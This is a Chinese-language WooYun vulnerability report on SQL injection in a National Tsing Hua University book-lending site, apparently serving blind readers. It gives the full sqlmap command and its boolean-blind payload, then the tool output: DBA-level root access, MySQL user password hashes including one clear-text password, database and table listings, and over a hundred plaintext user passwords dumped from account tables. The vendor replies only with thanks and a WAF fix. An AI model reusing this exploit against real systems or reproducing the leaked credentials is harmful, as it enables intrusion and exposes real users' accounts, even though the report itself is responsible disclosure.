乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-03: 细节已通知厂商并且等待厂商处理中 2015-12-05: 厂商已经确认,细节仅向厂商公开 2015-12-15: 细节向核心白帽子及相关领域专家公开 2015-12-25: 细节向普通白帽子公开 2016-01-04: 细节向实习白帽子公开 2016-01-19: 细节向公众公开
国立清华大学某站存在SQL注射漏洞(DBA权限+root密码+系统管理密码+大量用户明文密码)
地址:http://**.**.**.**/aviso/list/available_book.php?class=LA
$ python sqlmap.py -u "http://**.**.**.**/aviso/list/available_book.php?class=LA" -p class --technique=B --random-agent --batch --no-cast --current-user --is-dba --users --passwords --count --search -C pass
current user: 'root@localhost'current user is DBA: Truedatabase management system users [14]:[*] ''@'**.**.**.**'[*] ''@'localhost'[*] 'bplan'@'**.**.**.**'[*] 'bplan'@'**.**.**.**'[*] 'ideal'@'localhost'[*] 'project'@'localhost'[*] 'root'@'**.**.**.**'[*] 'root'@'::1'[*] 'root'@'**.**.**.**'[*] 'root'@'localhost'[*] 'shadow'@'localhost'[*] 'tcs'@'%'[*] 'tcs'@'**.**.**.**'[*] 'tcs'@'localhost'database management system users password hashes:[*] [1]: password hash: NULL[*] bplan [1]: password hash: 3dae533c070a7c05[*] ideal [1]: password hash: 39171de84099b35d[*] project [1]: password hash: 48b5354d1be7db97 clear-text password: project[*] root [2]: password hash: 1d7586b137a8cb57 password hash: NULL[*] shadow [1]: password hash: 6573964f2f148124[*] tcs [2]: password hash: *8D71256BB4128ECD2E4D94886D89500320B63C87 password hash: 7032160f2b1b2321
Database: TextbookQuestionary96Table: account[29 entries]+--------------+| login_passwd |+--------------+| 11153 || 400924 || 86852011 || p221922 || PT10864 || PT11080 || PT22060 || PT26056 || PT30070 || PT403 || PT41401 || PT42050 || PT42149 || PT60043 || PT63850 || PT640501 || PT70047 || PT70148 || PT70449 || PT71088 || PT71242 || PT72242 || PT74169 || PT80748 || PT81157 || PT83052 || PT83067 || PT94641 || tel5048 |+--------------+Database: TextbookQuestionaryTable: account[98 entries]+--------------+| login_passwd |+--------------+| || 0000 || 010335 || 064328 || 064342 || 1000801 || 107 || 110311t || 110312 || 1121 || 120402 || 140404 || 150303 || 190315t || 190406 || 202182 || 20403 || 2051001 || 210303 || 210309T || 211419 || 2115418 || 227 || 2304082 || 23250957 || 27977035 || 323301 || 3313sh || 3331 || 350001 || 363301 || 505661 || 54321 || 552588 || 553302i || 576579 || 8320364 || 84265751 || 86852011 || 90305 || 9184044 || adm109 || arrow743 || cyhsspec || fg222 || pcsh2010 || PT10051 || PT10671 || PT111-5 || PT11660 || PT11665 || PT20345 || PT22066 || PT22177 || PT2222 || PT23443 || PT24306 || PT26051 || PT26542 || PT30070 || PT30343 || PT32015 || PT32041 || PT32742 || PT33052 || PT35857 || PT40249 || PT40308 || PT40642 || PT40861 || PT41260 || PT41401 || PT42147 || PT42149 || PT50057 || PT54044 || PT54546 || PT60043 || PT60070 || PT63850 || PT65145 || PT70043 || PT70116 || PT80276 || PT80284 || PT80748 || PT81157 || PT81368 || PT83067 || PT85214 || PT85247 || PT93075 || PT97054 || special || tel5048 || trista || wutywuty || ym8175 |+--------------+
---Parameter: class (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: class=LA' AND 8567=8567#---web server operating system: FreeBSDweb application technology: PHP 4.4.9, Apache 2.2.18back-end DBMS: MySQL >= 5.0.0current user: 'root@localhost'current user is DBA: Truedatabase management system users [14]:[*] ''@'**.**.**.**'[*] ''@'localhost'[*] 'bplan'@'**.**.**.**'[*] 'bplan'@'**.**.**.**'[*] 'ideal'@'localhost'[*] 'project'@'localhost'[*] 'root'@'**.**.**.**'[*] 'root'@'::1'[*] 'root'@'**.**.**.**'[*] 'root'@'localhost'[*] 'shadow'@'localhost'[*] 'tcs'@'%'[*] 'tcs'@'**.**.**.**'[*] 'tcs'@'localhost'database management system users password hashes:[*] [1]: password hash: NULL[*] bplan [1]: password hash: 3dae533c070a7c05[*] ideal [1]: password hash: 39171de84099b35d[*] project [1]: password hash: 48b5354d1be7db97 clear-text password: project[*] root [2]: password hash: 1d7586b137a8cb57 password hash: NULL[*] shadow [1]: password hash: 6573964f2f148124[*] tcs [2]: password hash: *8D71256BB4128ECD2E4D94886D89500320B63C87 password hash: 7032160f2b1b2321Database: TextbookQuestionary+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| Require | 2994 || DistributeHistory | 1856 || Student | 555 || SchoolList | 504 || DistributeVersion | 492 || NoRequireList | 384 || MailToAll | 301 || SubjectSetting | 203 || Require_backup | 202 || account | 98 || UserInformation | 98 || QuestionarySub | 22 || DistributeSub | 20 || PublisherSetting | 17 || QuestionaryPub | 11 || DLtimeline | 1 || QuestionaryDuration | 1 |+---------------------------------------+---------+Database: performance_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| setup_consumers | 8 || performance_timers | 5 || setup_timers | 1 |+---------------------------------------+---------+Database: mp3_file+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| `count` | 3229911 || nthu_new | 75170 || ckysc | 22389 || ckysc_back | 6454 || tmp | 5699 || blindreader | 2608 || mp3_new | 2203 || daisy | 2037 || lb | 1695 || ncue | 1470 || shadow | 1459 || reader | 1446 || reader_bfRename | 546 || tkblind | 296 || tape | 294 || braille | 62 || nthu_book_rf | 42 || mp3_file_cdremove | 10 || db_update_date | 1 || owl_update_date | 1 |+---------------------------------------+---------+Database: BlindSystem+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| bookHandleRec | 100596 || lendbook | 81713 || reader_lend | 78696 || bookLendRegTmp | 46761 || book | 17702 || bookView | 17702 || booktemp1 | 16676 || success | 13447 || bookCopy | 10162 || bookCount | 10101 || printDateReg | 9224 || bookCopyTmp | 8285 || man | 5467 || bookmail | 3855 || temp | 3673 || reader | 3506 || readerInfo_delete | 3324 || bookckysc | 2653 || bookAbstract | 2345 || readerTmp | 1969 || borrowing | 1439 || booklendreg2009 | 705 || textbook | 669 || textbooktemp | 579 || textbookold | 488 || CSD | 308 || Gio | 306 || bookLendReg | 257 || Giobook | 223 || MP3machineLend | 79 || tmp | 66 || failure | 57 || succProblem | 49 || bookRF | 42 || MP3machineList | 39 || textbook_lend | 23 || succTmp | 15 || worker | 13 || StatisticLogin | 5 || request | 2 || mngrLog | 1 |+---------------------------------------+---------+Database: mysql+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| help_relation | 992 || help_topic | 505 || help_keyword | 453 || help_category | 38 || `user` | 14 || tables_priv | 3 || db | 2 || proxies_priv | 2 |+---------------------------------------+---------+Database: TextbookQuestionary96+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| DistributeHistory | 1560 || DistributeHis_0912 | 1440 || Require0824 | 205 || Require | 202 || TESTofSQL | 196 || Student | 75 || account | 29 || UserInformation | 28 || QuestionarySub | 22 || QuestionarySub2 | 22 || QuestionarySub3 | 22 || DistributeSub | 20 || QuestionaryPub | 11 || QuestionaryPub1 | 11 |+---------------------------------------+---------+Database: aviso+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| reGuest | 46356 || success | 29875 || success20100309 | 27535 || recording | 4580 || newBook | 547 || UA | 426 || guest | 157 || GYnewbook | 117 || tmp | 87 || bookRF | 42 |+---------------------------------------+---------+Database: 94project+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| worker | 2369 || book_back | 804 || book | 458 || tmp | 308 || bookRF | 42 || working | 9 |+---------------------------------------+---------+Database: information_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| COLUMNS | 1450 || SESSION_VARIABLES | 321 || GLOBAL_VARIABLES | 310 || GLOBAL_STATUS | 309 || SESSION_STATUS | 309 || USER_PRIVILEGES | 203 || COLLATION_CHARACTER_SET_APPLICABILITY | 195 || COLLATIONS | 195 || TABLES | 190 || PARTITIONS | 189 || STATISTICS | 105 || KEY_COLUMN_USAGE | 99 || TABLE_CONSTRAINTS | 60 || CHARACTER_SETS | 39 || SCHEMA_PRIVILEGES | 32 || PLUGINS | 17 || SCHEMATA | 11 || INNODB_CMPMEM | 8 || INNODB_CMPMEM_RESET | 8 || ENGINES | 6 || INNODB_CMP | 5 || INNODB_CMP_RESET | 5 || TABLE_PRIVILEGES | 3 || PROCESSLIST | 1 || VIEWS | 1 |+---------------------------------------+---------+columns LIKE 'pass' were found in the following databases:Database: TextbookQuestionary96Table: account[1 column]+--------------+| Column |+--------------+| login_passwd |+--------------+Database: TextbookQuestionaryTable: account[1 column]+--------------+| Column |+--------------+| login_passwd |+--------------+Database: mp3_fileTable: shadow[1 column]+----------+| Column |+----------+| password |+----------+Database: mp3_fileTable: reader_bfRename[1 column]+----------+| Column |+----------+| password |+----------+Database: mp3_fileTable: reader[1 column]+----------+| Column |+----------+| password |+----------+Database: mysqlTable: user[1 column]+----------+| Column |+----------+| Password |+----------+Database: mysqlTable: servers[1 column]+----------+| Column |+----------+| Password |+----------+Database: TextbookQuestionary96Table: account[29 entries]+--------------+| login_passwd |+--------------+| 11153 || 400924 || 86852011 || p221922 || PT10864 || PT11080 || PT22060 || PT26056 || PT30070 || PT403 || PT41401 || PT42050 || PT42149 || PT60043 || PT63850 || PT640501 || PT70047 || PT70148 || PT70449 || PT71088 || PT71242 || PT72242 || PT74169 || PT80748 || PT81157 || PT83052 || PT83067 || PT94641 || tel5048 |+--------------+Database: TextbookQuestionaryTable: account[98 entries]+--------------+| login_passwd |+--------------+| || 0000 || 010335 || 064328 || 064342 || 1000801 || 107 || 110311t || 110312 || 1121 || 120402 || 140404 || 150303 || 190315t || 190406 || 202182 || 20403 || 2051001 || 210303 || 210309T || 211419 || 2115418 || 227 || 2304082 || 23250957 || 27977035 || 323301 || 3313sh || 3331 || 350001 || 363301 || 505661 || 54321 || 552588 || 553302i || 576579 || 8320364 || 84265751 || 86852011 || 90305 || 9184044 || adm109 || arrow743 || cyhsspec || fg222 || pcsh2010 || PT10051 || PT10671 || PT111-5 || PT11660 || PT11665 || PT20345 || PT22066 || PT22177 || PT2222 || PT23443 || PT24306 || PT26051 || PT26542 || PT30070 || PT30343 || PT32015 || PT32041 || PT32742 || PT33052 || PT35857 || PT40249 || PT40308 || PT40642 || PT40861 || PT41260 || PT41401 || PT42147 || PT42149 || PT50057 || PT54044 || PT54546 || PT60043 || PT60070 || PT63850 || PT65145 || PT70043 || PT70116 || PT80276 || PT80284 || PT80748 || PT81157 || PT81368 || PT83067 || PT85214 || PT85247 || PT93075 || PT97054 || special || tel5048 || trista || wutywuty || ym8175 |+--------------+
上WAF。
危害等级:高
漏洞Rank:18
确认时间:2015-12-05 22:37
感謝通報
暂无